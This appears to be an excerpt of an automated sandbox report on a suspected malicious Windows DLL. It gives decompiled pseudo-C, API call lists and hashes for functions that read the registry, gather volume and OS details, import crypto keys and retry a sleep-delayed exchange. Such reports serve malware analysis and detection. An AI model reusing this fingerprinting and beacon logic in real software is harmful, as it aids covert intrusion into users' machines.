                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CryptHash$_errnofree$lstrcpymalloc$ComputerCreateDataDestroyErrorFreeHeapInformationLastNameParamVolumecalloclstrcatwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3926501904-0
                                                                                                                                                  • Opcode ID: 2e5c205c13924f8816918da83e921bd12bfe325c2fbdb630c39bb4d5ffb0fb47
                                                                                                                                                  • Instruction ID: c705da80e763194c9f648acf8c890ebc62b71847e16146798ed5398bc1ee8608
                                                                                                                                                  • Opcode Fuzzy Hash: 2e5c205c13924f8816918da83e921bd12bfe325c2fbdb630c39bb4d5ffb0fb47
                                                                                                                                                  • Instruction Fuzzy Hash: 0F31B0B171CA8482DB04CB25E5543AEB3A2F789BD8F944126EB9E47B58DF3DC505CB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704A00, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E67704A00(void* __edi, void* __esp, signed int* __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8) {
				void* _t23;
				void* _t26;
				signed int _t27;
				unsigned int _t34;
				void* _t43;
				signed int* _t44;
				void* _t46;
				void* _t65;
				long long _t67;
				void* _t68;
				void* _t71;
				void* _t74;
				void* _t76;
				void* _t77;
				void* _t78;

				_t74 = __r8;
				_t64 = __rsi;
				_t62 = __rdi;
				_t44 = __rbx;
				_t39 = __esp;
				_t43 = _t71;
				 *(_t43 + 8) = __rbx;
				 *((long long*)(_t43 + 0x10)) = _t67;
				 *((long long*)(_t43 + 0x18)) = __rsi;
				 *((long long*)(_t43 + 0x20)) = __rdi;
				_t78 = __rcx;
				E6770532C(4, _t43, __rbx, __rsi, _t77);
				_t58 =  *(_t43 + 8);
				_t27 =  *( *(_t43 + 8));
				E677039E8(__edi, __esp, _t43, _t44, _t43, __rdi);
				if(_t27 < 0) {
					_t27 =  ~_t27;
				}
				E67701000(_t44, "b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435", _t58, _t74);
				_t68 = _t43;
				_t34 = (0x92492493 * _t27 >> 0x20) + _t27 >> 2;
				r8d = _t34;
				r8d = r8d >> 0x1f;
				_t36 = (_t34 + r8d) * 7;
				_t10 = _t44 + 8; // 0x8
				E67705398(_t10, _t39, _t44, _t68, _t62, _t64, _t68, _t76);
				_t65 = _t43;
				if(_t68 != 0) {
					free();
				}
				E67705210(4, _t39, _t43, _t44, _t65, _t68);
				_t23 = E67705440(_t36, _t39, _t43, _t78, _t43, _t65); // executed
				_t69 = _t43;
				free(??);
				if(_t43 != 0) {
					E67707758(_t23,  *((intOrPtr*)(_t69 + 8)), _t65);
					_t46 = _t43;
					E677039E8(0, _t39, _t43, _t46, _t69, _t62);
					free(??);
					dil = _t46 != 0;
					_t26 = 0;
				} else {
					free();
					_t26 = 0;
				}
				return _t26;
			}


















                                                                                                                                                  0x67704a00
                                                                                                                                                  0x67704a00
                                                                                                                                                  0x67704a00
                                                                                                                                                  0x67704a00
                                                                                                                                                  0x67704a00
                                                                                                                                                  0x67704a00
                                                                                                                                                  0x67704a03
                                                                                                                                                  0x67704a07
                                                                                                                                                  0x67704a0b
                                                                                                                                                  0x67704a0f
                                                                                                                                                  0x67704a19
                                                                                                                                                  0x67704a21
                                                                                                                                                  0x67704a29
                                                                                                                                                  0x67704a2d
                                                                                                                                                  0x67704a2f
                                                                                                                                                  0x67704a38
                                                                                                                                                  0x67704a3a
                                                                                                                                                  0x67704a3a
                                                                                                                                                  0x67704a43
                                                                                                                                                  0x67704a48
                                                                                                                                                  0x67704a54
                                                                                                                                                  0x67704a57
                                                                                                                                                  0x67704a5a
                                                                                                                                                  0x67704a61
                                                                                                                                                  0x67704a69
                                                                                                                                                  0x67704a6c
                                                                                                                                                  0x67704a71
                                                                                                                                                  0x67704a77
                                                                                                                                                  0x67704a7c
                                                                                                                                                  0x67704a7c
                                                                                                                                                  0x67704a86
                                                                                                                                                  0x67704a97
                                                                                                                                                  0x67704a9f
                                                                                                                                                  0x67704aa2
                                                                                                                                                  0x67704aaa
                                                                                                                                                  0x67704abf
                                                                                                                                                  0x67704ac7
                                                                                                                                                  0x67704aca
                                                                                                                                                  0x67704ad2
                                                                                                                                                  0x67704ada
                                                                                                                                                  0x67704ade
                                                                                                                                                  0x67704aac
                                                                                                                                                  0x67704aaf
                                                                                                                                                  0x67704ab4
                                                                                                                                                  0x67704ab4
                                                                                                                                                  0x67704afa

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 67705342
                                                                                                                                                    • Part of subcall function 6770532C: malloc.LIBCMT ref: 6770534C
                                                                                                                                                    • Part of subcall function 6770532C: CryptGenRandom.ADVAPI32(?,?,00000000,67704A26,?,?,?,6770147B), ref: 67705366
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 67705373
                                                                                                                                                    • Part of subcall function 6770532C: free.LIBCMT ref: 6770537B
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • free.LIBCMT ref: 67704A7C
                                                                                                                                                  • free.LIBCMT ref: 67704AA2
                                                                                                                                                  • free.LIBCMT ref: 67704AAF
                                                                                                                                                  • free.LIBCMT ref: 67704AD2
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  Strings
                                                                                                                                                  • b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435, xrefs: 67704A3C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$malloc$CryptErrorFreeHeapLastRandom_errno
                                                                                                                                                  • String ID: b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435
                                                                                                                                                  • API String ID: 2593992524-3477985423
                                                                                                                                                  • Opcode ID: 4abd91989e4531d4fbeb9fa9e8ea263cc7efb8140d25f08434c9c92c7e0230b1
                                                                                                                                                  • Instruction ID: ceae5158cd8f265b59e86bf4fba4f0075ade068d5f642554a9dbd05b15a756ce
                                                                                                                                                  • Opcode Fuzzy Hash: 4abd91989e4531d4fbeb9fa9e8ea263cc7efb8140d25f08434c9c92c7e0230b1
                                                                                                                                                  • Instruction Fuzzy Hash: 951102E23152414ACA08AB67EA5865EA6D5ABDEFC8B8C9034DF0A4B708EF28D5518345
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677036D4, Relevance: 7.6, APIs: 5, Instructions: 54registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 15%
                                                                                                                                                  			E677036D4(long long __rbx, void* __rdx, void* __r8, long long _a8, char _a16, char _a32) {
				long long _v16;
				signed int _v24;
				void* __rdi;
				long _t18;
				long _t19;
				long _t22;
				void* _t27;
				void* _t28;
				long long _t35;
				void* _t51;

				_a8 = __rbx;
				if(__rdx == 0 || __r8 == 0) {
					L5:
					_t18 = 0;
				} else {
					r9d = 0x20019;
					r8d = 0;
					_v24 =  &_a32;
					_t19 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
					if(_t19 != 0) {
						goto L5;
					} else {
						_t35 =  &_a16;
						r9d = 0;
						_v16 = _t35;
						_v24 = _v24 & 0x00000000;
						r8d = 0;
						if(RegQueryValueExW(??, ??, ??, ??, ??, ??) == 0) {
							E677038E4(_a16, _t28, _t35, __r8, _t51);
							r9d = 0;
							r8d = 0;
							_t50 = _t35;
							_v16 =  &_a16;
							_v24 =  *((intOrPtr*)(_t35 + 8));
							_t22 = RegQueryValueExW(??, ??, ??, ??, ??, ??);
							_t18 = RegCloseKey(??);
							if(_t22 != 0) {
								E677039E8(_t27, _t28,  &_a16, __r8, _t50, _t50);
								goto L5;
							}
						} else {
							RegCloseKey();
							goto L5;
						}
					}
				}
				return _t18;
			}













                                                                                                                                                  0x677036d4
                                                                                                                                                  0x677036e4
                                                                                                                                                  0x6770373b
                                                                                                                                                  0x6770373b
                                                                                                                                                  0x677036eb
                                                                                                                                                  0x677036f0
                                                                                                                                                  0x677036f6
                                                                                                                                                  0x677036f9
                                                                                                                                                  0x677036fe
                                                                                                                                                  0x67703706
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703708
                                                                                                                                                  0x6770370d
                                                                                                                                                  0x67703712
                                                                                                                                                  0x67703715
                                                                                                                                                  0x6770371a
                                                                                                                                                  0x67703720
                                                                                                                                                  0x6770372e
                                                                                                                                                  0x6770374c
                                                                                                                                                  0x67703751
                                                                                                                                                  0x67703754
                                                                                                                                                  0x67703757
                                                                                                                                                  0x67703766
                                                                                                                                                  0x6770376b
                                                                                                                                                  0x67703775
                                                                                                                                                  0x67703782
                                                                                                                                                  0x6770378a
                                                                                                                                                  0x6770378f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770378f
                                                                                                                                                  0x67703730
                                                                                                                                                  0x67703735
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67703735
                                                                                                                                                  0x6770372e
                                                                                                                                                  0x67703706
                                                                                                                                                  0x67703747

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,67706CAF,?,?,00000000,677013F3), ref: 677036FE
                                                                                                                                                  • RegQueryValueExW.ADVAPI32 ref: 67703726
                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 67703735
                                                                                                                                                  • RegQueryValueExW.ADVAPI32 ref: 67703775
                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 67703782
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseQueryValue$Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4082589901-0
                                                                                                                                                  • Opcode ID: 87713a4b5b8b8ec562302d16a4e07c3f02acec27f8640c5afc730586adefa789
                                                                                                                                                  • Instruction ID: 34d34428e18656d987f059e0176124dec6b490dd0ac6e28372016881d55e5da2
                                                                                                                                                  • Opcode Fuzzy Hash: 87713a4b5b8b8ec562302d16a4e07c3f02acec27f8640c5afc730586adefa789
                                                                                                                                                  • Instruction Fuzzy Hash: 341172B631CB8081EB108B61F688F1AA7E4F799BD8F941135DA8D47B24DF2DC1558B00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67706C40, Relevance: 6.1, APIs: 4, Instructions: 126sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E67706C40(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __eflags, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed int _t42;
				signed int _t43;
				signed int _t48;
				void* _t51;
				signed int _t62;
				signed int _t63;
				void* _t69;
				intOrPtr* _t89;
				char* _t110;
				void* _t118;
				intOrPtr* _t121;
				intOrPtr* _t125;
				void* _t129;
				void* _t130;

				_t129 = __r9;
				_t128 = __r8;
				_t123 = __rbp;
				_t120 = __rsi;
				_t115 = __rdx;
				_t90 = __rbx;
				_t70 = __esp;
				_t69 = __esi;
				_t68 = __edi;
				_t64 = __ecx;
				_t63 = __ebx;
				_t89 = _t125;
				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = __rbp;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				 *((long long*)(_t89 + 0x20)) = __rdi;
				r12d = 0;
				_t118 = __rcx;
				 *((intOrPtr*)(__rcx + 1)) = r12w;
				 *((intOrPtr*)(__rcx + 4)) = r12w;
				E677061A0(__rbx,  *((intOrPtr*)(__rcx + 8)), __rsi);
				E67706238(_t89, _t90,  *((intOrPtr*)(__rcx + 8)), _t130);
				E67705DE4(__ecx, __edi, __esp, _t90, __rdx, _t118, _t120, _t123, __r8);
				_t121 = _t89;
				if(_t89 == 0) {
					L17:
					 *((intOrPtr*)(_t118 + 2)) = r12b;
					E677061A0(_t90,  *((intOrPtr*)(_t118 + 8)), _t121);
					_t42 = E67704790(E67706238(_t89, _t90,  *((intOrPtr*)(_t118 + 8))), _t63, _t64, _t68, _t69, _t70, _t89, _t90, _t118, _t115, _t121, _t123, _t128, _t129); // executed
					 *(_t118 + 0x10) = _t42;
					_t86 = _t42 - 0xffffffff;
					if(_t42 != 0xffffffff) {
						goto L15;
					} else {
						SleepEx(); // executed
						E67706A7C(0x3156, _t68, _t70, _t86, _t90, _t115, _t121, _t123, _t128, _t129);
						r8b = 1;
						_t92 = _t89;
						E6770686C(_t68, _t89,  *((intOrPtr*)(_t118 + 8)), _t89, _t118, _t121, _t123);
						_t48 = E67704790(E677067E4(0x3156, _t68, _t70, _t89, _t89, _t89, _t118, _t121, _t123, _t128), _t63, 0x3156, _t68, _t69, _t70, _t89, _t92, _t118, _t89, _t121, _t123, _t128, _t129); // executed
						 *(_t118 + 0x10) = _t48;
						_t43 = _t48 & 0xffffff00 | _t48 != 0xffffffff;
					}
				} else {
					E677034F0(__edi, __esp, _t90, _t121); // executed
					_t90 = _t89;
					if(_t89 == 0) {
						goto L17;
					} else {
						_t128 = _t89;
						_t115 = _t121;
						E677036D4(_t90, _t121, _t89); // executed
						_t123 = _t89;
						free(??);
						free(??);
						if(_t89 == 0) {
							goto L17;
						} else {
							_t9 = _t130 + 0x10; // 0x10
							_t51 = E67703938(_t9, __esp, _t89, _t90, 0x67713018, _t121, _t128);
							_t115 = _t89;
							_t90 = _t89;
							E67704688(_t51, _t64, _t9, _t89, _t123, _t89, _t129);
							_t121 = _t89;
							E677039E8(_t68, __esp, _t89, _t89, _t123, _t118);
							E677039E8(_t68, _t70, _t89, _t89, _t90, _t118);
							if(_t121 == 0) {
								goto L17;
							} else {
								r8d =  *_t121;
								if(r8d < 5) {
									L16:
									E677039E8(_t68, _t70, _t89, _t90, _t121, _t118);
									goto L17;
								} else {
									_t110 =  *((intOrPtr*)(_t121 + 8));
									if( *_t110 != 0x7b ||  *((char*)(_t110 + 1)) != 0x22 ||  *((intOrPtr*)(_t89 + _t110)) != r12b ||  *((char*)(_t89 + _t110)) != 0x7d ||  *((char*)(_t89 + _t110)) != 0x22) {
										goto L16;
									} else {
										E6770635C(_t68, _t70, _t89, _t110, _t115);
										_t90 = _t89;
										E677039E8(_t68, _t70, _t89, _t90, _t121, _t118);
										if(_t90 == 0) {
											goto L17;
										} else {
											r8d = 0;
											_t115 = _t90;
											 *((char*)(_t118 + 2)) = 1;
											E6770686C(_t68, _t90,  *((intOrPtr*)(_t118 + 8)), _t90, _t118, _t121, _t123);
											_t62 = E677067E4(_t64, _t68, _t70, _t89, _t90, _t90, _t118, _t121, _t123, _t128);
											 *((intOrPtr*)(_t118 + 4)) = r12w;
											while(1) {
												_t62 = E67704790(_t62, _t63, _t64, _t68, _t69, _t70, _t89, _t90, _t118, _t115, _t121, _t123, _t128, _t129);
												 *(_t118 + 0x10) = _t62;
												if(_t62 != 0xffffffff) {
													break;
												}
												_t64 = 0x3156;
												Sleep(??);
												 *((short*)(_t118 + 4)) =  *((short*)(_t118 + 4)) + 1;
												if( *((short*)(_t118 + 4)) < 2) {
													continue;
												} else {
													goto L17;
												}
												goto L19;
											}
											L15:
											_t43 = 1;
										}
									}
								}
							}
						}
					}
				}
				L19:
				return _t43;
			}

















                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c40
                                                                                                                                                  0x67706c43
                                                                                                                                                  0x67706c47
                                                                                                                                                  0x67706c4b
                                                                                                                                                  0x67706c4f
                                                                                                                                                  0x67706c59
                                                                                                                                                  0x67706c5c
                                                                                                                                                  0x67706c5f
                                                                                                                                                  0x67706c64
                                                                                                                                                  0x67706c6d
                                                                                                                                                  0x67706c76
                                                                                                                                                  0x67706c7b
                                                                                                                                                  0x67706c80
                                                                                                                                                  0x67706c86
                                                                                                                                                  0x67706dad
                                                                                                                                                  0x67706db1
                                                                                                                                                  0x67706db5
                                                                                                                                                  0x67706dc6
                                                                                                                                                  0x67706dcb
                                                                                                                                                  0x67706dce
                                                                                                                                                  0x67706dd1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706dd3
                                                                                                                                                  0x67706dd8
                                                                                                                                                  0x67706dde
                                                                                                                                                  0x67706dea
                                                                                                                                                  0x67706ded
                                                                                                                                                  0x67706df0
                                                                                                                                                  0x67706e00
                                                                                                                                                  0x67706e08
                                                                                                                                                  0x67706e0b
                                                                                                                                                  0x67706e0b
                                                                                                                                                  0x67706c8c
                                                                                                                                                  0x67706c8c
                                                                                                                                                  0x67706c91
                                                                                                                                                  0x67706c97
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706c9d
                                                                                                                                                  0x67706c9d
                                                                                                                                                  0x67706ca0
                                                                                                                                                  0x67706caa
                                                                                                                                                  0x67706cb2
                                                                                                                                                  0x67706cb5
                                                                                                                                                  0x67706cbd
                                                                                                                                                  0x67706cc5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706ccb
                                                                                                                                                  0x67706ccb
                                                                                                                                                  0x67706cd7
                                                                                                                                                  0x67706cdf
                                                                                                                                                  0x67706ce2
                                                                                                                                                  0x67706ce5
                                                                                                                                                  0x67706ced
                                                                                                                                                  0x67706cf0
                                                                                                                                                  0x67706cf8
                                                                                                                                                  0x67706d00
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d06
                                                                                                                                                  0x67706d06
                                                                                                                                                  0x67706d0d
                                                                                                                                                  0x67706da5
                                                                                                                                                  0x67706da8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d13
                                                                                                                                                  0x67706d13
                                                                                                                                                  0x67706d1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d44
                                                                                                                                                  0x67706d44
                                                                                                                                                  0x67706d4c
                                                                                                                                                  0x67706d4f
                                                                                                                                                  0x67706d57
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d59
                                                                                                                                                  0x67706d5d
                                                                                                                                                  0x67706d60
                                                                                                                                                  0x67706d63
                                                                                                                                                  0x67706d67
                                                                                                                                                  0x67706d6f
                                                                                                                                                  0x67706d74
                                                                                                                                                  0x67706d79
                                                                                                                                                  0x67706d7c
                                                                                                                                                  0x67706d81
                                                                                                                                                  0x67706d87
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d89
                                                                                                                                                  0x67706d8e
                                                                                                                                                  0x67706d94
                                                                                                                                                  0x67706d9d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67706d9d
                                                                                                                                                  0x67706da1
                                                                                                                                                  0x67706da1
                                                                                                                                                  0x67706da1
                                                                                                                                                  0x67706d57
                                                                                                                                                  0x67706d1a
                                                                                                                                                  0x67706d0d
                                                                                                                                                  0x67706d00
                                                                                                                                                  0x67706cc5
                                                                                                                                                  0x67706c97
                                                                                                                                                  0x67706e0e
                                                                                                                                                  0x67706e28

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67705DE4: GetVersionExW.KERNEL32 ref: 67705E31
                                                                                                                                                    • Part of subcall function 67705DE4: free.LIBCMT ref: 67705F05
                                                                                                                                                    • Part of subcall function 67705DE4: free.LIBCMT ref: 67705F0D
                                                                                                                                                    • Part of subcall function 67705DE4: free.LIBCMT ref: 67705F15
                                                                                                                                                    • Part of subcall function 67705DE4: free.LIBCMT ref: 67705F1D
                                                                                                                                                    • Part of subcall function 67705DE4: free.LIBCMT ref: 67705F25
                                                                                                                                                    • Part of subcall function 67705DE4: lstrlenW.KERNEL32 ref: 67705F32
                                                                                                                                                    • Part of subcall function 67705DE4: malloc.LIBCMT ref: 67705F3F
                                                                                                                                                    • Part of subcall function 67705DE4: lstrcpyW.KERNEL32 ref: 67705F52
                                                                                                                                                  • SleepEx.KERNEL32(?,?,00000000,677013F3), ref: 67706DD8
                                                                                                                                                    • Part of subcall function 677034F0: GetVolumeInformationW.KERNELBASE ref: 6770353A
                                                                                                                                                    • Part of subcall function 677034F0: wsprintfW.USER32 ref: 67703551
                                                                                                                                                    • Part of subcall function 677034F0: free.LIBCMT ref: 6770358A
                                                                                                                                                    • Part of subcall function 677034F0: lstrcatW.KERNEL32 ref: 67703597
                                                                                                                                                    • Part of subcall function 677034F0: free.LIBCMT ref: 677035A0
                                                                                                                                                    • Part of subcall function 677034F0: lstrlenW.KERNEL32 ref: 677035AA
                                                                                                                                                    • Part of subcall function 677034F0: malloc.LIBCMT ref: 677035E7
                                                                                                                                                    • Part of subcall function 677034F0: _strrev.LIBCMT ref: 6770360D
                                                                                                                                                    • Part of subcall function 677034F0: lstrlenA.KERNEL32 ref: 67703615
                                                                                                                                                    • Part of subcall function 677034F0: CharUpperBuffA.USER32 ref: 67703620
                                                                                                                                                    • Part of subcall function 677034F0: free.LIBCMT ref: 67703634
                                                                                                                                                    • Part of subcall function 677034F0: malloc.LIBCMT ref: 6770363C
                                                                                                                                                    • Part of subcall function 677036D4: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,67706CAF,?,?,00000000,677013F3), ref: 677036FE
                                                                                                                                                    • Part of subcall function 677036D4: RegQueryValueExW.ADVAPI32 ref: 67703726
                                                                                                                                                    • Part of subcall function 677036D4: RegCloseKey.ADVAPI32 ref: 67703735
                                                                                                                                                  • free.LIBCMT ref: 67706CB5
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • free.LIBCMT ref: 67706CBD
                                                                                                                                                    • Part of subcall function 67704688: CryptImportKey.ADVAPI32 ref: 677046EE
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • Sleep.KERNEL32(?,?,00000000,677013F3), ref: 67706D8E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$lstrlenmalloc$Sleep$BuffCharCloseCryptErrorFreeHeapImportInformationLastOpenQueryUpperValueVersionVolume_errno_strrevlstrcatlstrcpywsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2545908439-0
                                                                                                                                                  • Opcode ID: 09cd35d094a6ad54a045a6ea05e2bae673b47908dc1b4cdded9afea945eeb8b3
                                                                                                                                                  • Instruction ID: 1224e6bf14eda5d8c4d658778780e0ff132438710857a9f60e2db12ffc65e05a
                                                                                                                                                  • Opcode Fuzzy Hash: 09cd35d094a6ad54a045a6ea05e2bae673b47908dc1b4cdded9afea945eeb8b3
                                                                                                                                                  • Instruction Fuzzy Hash: C741D7B161968056DE04DF32DB2815C77E1EB8DF98B444525CB698BB54EF39D2F1C302
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770C5A0, Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                                  			E6770C5A0(void* __ecx, signed long long __rax, long long __rbx, signed long long __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				signed long long _v24;
				void* __rdi;
				signed int _t13;
				intOrPtr _t14;
				signed int _t17;
				signed int _t23;
				signed long long _t24;
				signed long long _t27;
				intOrPtr* _t29;
				signed long long _t31;
				void* _t40;
				signed long long* _t41;
				signed long long _t46;

				_t44 = __rbp;
				_t42 = __rsi;
				_t39 = __rdx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if( *0x67719b20 == 0) {
					_t13 = E6770A91C();
				}
				_t29 =  *0x67717408; // 0x0
				_t23 = 0;
				if(_t29 != 0) {
					while(1) {
						_t14 =  *_t29;
						if(_t14 == 0) {
							break;
						}
						if(_t14 != 0x3d) {
							_t23 = _t23 + 1;
						}
						E6770D5B0(_t14, _t29);
						_t29 = _t29 + _t27 + 1;
					}
					_t6 = _t40 + 1; // 0x1
					_t13 = E6770C14C(_t29, _t6, _t39, _t40, _t42, _t44); // executed
					_t41 = _t27;
					 *0x677179b0 = _t27;
					if(_t27 == 0) {
						goto L3;
					} else {
						_t31 =  *0x67717408; // 0x0
						if( *_t31 == 0) {
							L16:
							free();
							 *0x67717408 =  *0x67717408 & 0x00000000;
							 *_t41 =  *_t41 & 0x00000000;
							 *0x67719b08 = 1;
							_t17 = 0;
						} else {
							do {
								_t13 = E6770D5B0(_t13, _t31);
								_t7 = _t27 + 1; // 0x1
								_t24 = _t7;
								if( *_t31 == 0x3d) {
									goto L14;
								} else {
									_t46 = _t24;
									_t13 = E6770C14C(_t31, _t46, _t39, _t41, _t42, _t46);
									 *_t41 = _t27;
									if(_t27 == 0) {
										L19:
										free();
										 *0x677179b0 =  *0x677179b0 & 0x00000000;
										goto L3;
									} else {
										_t39 = _t46;
										_t13 = E67707984(1, _t27, _t27, _t46, _t31);
										if(_t13 != 0) {
											_v24 = _v24 & 0x00000000;
											r9d = 0;
											r8d = 0;
											E677091B0();
											asm("int3");
											goto L19;
										} else {
											_t41 =  &(_t41[1]);
											goto L14;
										}
									}
								}
								goto L17;
								L14:
								_t27 = _t24;
								_t31 = _t31 + _t27;
							} while ( *_t31 != 0);
							_t31 =  *0x67717408; // 0x0
							goto L16;
						}
					}
				} else {
					L3:
					_t17 = _t13 | 0xffffffff;
				}
				L17:
				return _t17;
			}
















                                                                                                                                                  0x6770c5a0
                                                                                                                                                  0x6770c5a0
                                                                                                                                                  0x6770c5a0
                                                                                                                                                  0x6770c5a0
                                                                                                                                                  0x6770c5a0
                                                                                                                                                  0x6770c5a5
                                                                                                                                                  0x6770c5aa
                                                                                                                                                  0x6770c5bb
                                                                                                                                                  0x6770c5bd
                                                                                                                                                  0x6770c5bd
                                                                                                                                                  0x6770c5c2
                                                                                                                                                  0x6770c5c9
